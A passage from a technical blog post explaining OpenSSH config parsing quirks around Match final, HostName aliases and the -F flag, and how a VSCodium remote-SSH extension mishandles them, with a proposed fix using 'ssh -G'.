You may think, yes, but we don't have a Match final in that example. But if you thought that, then you forgot about the system config.

The system config is effectively appended to the user config, to allow any system wide settings. Most of the time this isn't an issue because of the first-come-first-served rule with config matches (rule 2). But if the system config includes a Match final, it will trigger the entire config to be re-parsed, including the user section. And it so happens that, at least on Fedora with the openssh-clients package installed, the system config does contain a Match final (see /etc/ssh/ssh_config.d).

But wait, there's more! If we want to specify a custom SSH config file, then we can use -F path/to/config in the command line. But this disables loading a system config, so we would no longer get the proxy!

To sum up, for the above config:

  1. ssh example doesn't have a proxy
  2. ...unless a system config contains Match final
  3. ...but invoking it as ssh -F ~/.ssh/config example definitely won't have the proxy
  4. ...but if a subprocess invokes ssh example while trying to resolve another host, it'll probably not add the -F ~/.ssh/config, so we might get the proxy again (in the child process).

Wait, how did that last one slip in? Well, unlike environment variables, it's a lot harder for processes to propagate command line flags correctly. If resolving the config involves running a script that itself tries to run SSH, chances are the -F flag won't be propagated and you'll see some weird behaviour.

I swear that's all for now, you've probably learned more about SSH configs than you will ever need to care about.

Back to VSCodium

Alright, armed now with this knowledge on SSH config parsing, we can work out what's going on with the extension. It ends up being a simple issue: it doesn't apply rules (3) and (4), so all Host matches are done against the original host name.

In my case, there are several machines behind the proxy, but they all share a common suffix, so I had a Host *.ozlabs.ibm.com rule to apply the proxy. I also use aliases to refer to the machines without the .ozlabs.ibm.com suffix, so failing to follow rule (3) lead to the situation where the extension didn't think there was a proxy.

However, even if this were to be fixed, it still doesn't respect rule (4), or most complex match logic in general. If the hostname bug is fixed then my setup would work, but it's less than ideal to keep playing whack-a-mole with parsing bugs. It would be a lot easier if there was a way to just ask SSH for the config that a given host name resolves to.

Enter ssh -G. The -G flag asks SSH to dump the complete resolved config, without actually opening the connection (it may execute arbitrary code while resolving the config however!). So to fix the extension once and for all, we could swap the manual parser to just invoking ssh -G example, and parsing the output as the final config. No Host or Match or HostName or Match final quirks to worry about.

Sure enough, if we replace the config backend with this 'native' resolver, we can connect to all the machines with no problem. Hopefully the pull request to add this support will get accepted, and I can stop running my locally patched copy of the extension.

In general, I'd suggest avoiding any dependency on a second pass being done on the config. Resolve your aliases early, so that the rest of your matches work against the full hostname. If you later need to match against the name passed in the command line, you can use Match originalhost=example. The example above should always be written as

Host example
    HostName example.ozlabs.ibm.com

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

even if the reversed order might appear to work thanks to the weird interactions described above. And after learning these parser quirks, I find the idea of using Host match statements unreliable; that they may or may not be run against the HostName value allows for truely strange bugs to appear. Maybe you should remove this uncertainty by starting your config with Match final to at least always be parsed the same way.